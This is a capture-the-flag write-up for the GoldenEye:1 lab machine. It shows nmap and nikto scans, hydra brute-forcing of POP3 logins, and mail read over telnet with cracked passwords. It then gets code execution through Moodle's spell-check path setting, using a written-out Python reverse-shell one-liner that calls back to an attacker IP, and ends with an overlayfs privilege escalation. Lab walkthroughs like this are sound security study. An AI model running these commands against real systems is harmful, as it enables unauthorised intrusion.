Last updated: 15 Apr 24 09:28:37 (UTC)

Write-Up Golden-Eye

Golden-Eye

By Lawcky 27/12/2023

Introduction

Golden-Eye is inspired by the James Bond series

Difficulty : medium

Additionnal info :

Name: GoldenEye: 1
Date release: 4 May 2018
Author: creosote
Series: GoldenEye

|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them

In this write-up

  • Hydra
  • strings
  • nmap
  • nikto
  • telnet for POP3
  • burpsuite
  • python RCE

Write-Up

First approach

98ddc0ba21190a6a9da93fb31143d02f.png

on the /sev-home

d9b34ad177502b14cf2f0e15ab4cb83b.png

the answer is in the souce code of the root page in the terminal.js file

88e6f1d4739410015f83eb3c3f81ff43.png

using burp’s Decoder :

a06ee2cd3d366d80e1f4fad5bef3d29f.png

boris:InvincibleHack3r

nmap

367c627f4c57f9d40f150ecada5c901f.png

we run a nmap scan on all ports to find the port used by pop3

nmap -p- gold.eye

nmap -sV -p 55006,55007 gold.eye

3da6fa084133dfa6aa385d561508eac2.png

port 55007 is used by pop3

hydra

nikto found a page at gold.eye/splashAdmin.php
on this page we see many username,
boris natalya janus admin and a mention for xenia, using the wordlist fasttrack.txt and hydra we can try to bruteforce a password for these users

hydra -L names.txt -P fasttrack.txt pop3://gold.eye:55007/

cf62089ff0108aa3b6e98ed833145ead.png

37957a44940bcd9cee16f7aa4d8c9589.png

POP3

we access their mail using telnet

for boris

telnet gold.eye 55007

USER boris

PASS secret1!

LIST

RETR 3

5559eae6d4c952cef8262295cadbe063.png

telnet gold.eye 55007

USER natalya

PASS bird

LIST

RETR 2

5bcff97b885d03efffe222af6684c5a6.png

we update our /etc/hosts and go to that site

Moodle

f4f21fbd2422e49fb08ce2ebcf95d8e4.png

17d1a3be5d5c775fdf8ec0c2a4343c21.png

found in xenia’s messages

hydra -l doak -P fasttrack.txt pop3://192.168.1.87:55007/

5141456bac7dff905ccc12d83355a68b.png

67041d8a7d1d523c504060e5e0d13211.png

be7f78023cd572b9bdb9c736117ac39b.png

7ea055ada607cafbe7588cb9d8d8cb3e.png

Admin password

61b6b83dfaaebba19251e91f1da9330b.png

here is the content of the page

using the strings commands of linux on it

0c2ecf159b3f38bdba64b162758a9f0c.png

1b6ac6e2a06bd4ff922d7449c2c596ed.png

the password was hidden in the image encrypted as base64

admin:xWinter1995x!

RCE

in the admin settings we can change the system’s path to execute code as the spell-checking tool in order to get a rce on the server

1c20eb42c496ab099ceb8748ca6376da.png

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.253",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
then nc -lnvp 4444

b3049902007dc73f24ce7a37a4c7d914.png

upgrade tty

python3 -c 'import pty; pty.spawn("/bin/bash")'

CTRL-Z + stty raw -echo && fg

export TERM=xterm-256color

exploit using overlayfs

we download overlays fs through the python http.server module, compile it and execute it

4c81eb41813fd0ba572d02ce68b91383.png

Flag

cat /root/.flag.txt
568628e0d993b1973adc718237da6e93

d71d777424a5b68d4b2493a64bf81d46.png

58193a37905582993ee9e5e5152b714f.png

Joplin Server v2.14.2, copyright © 2021-2024 JOPLIN.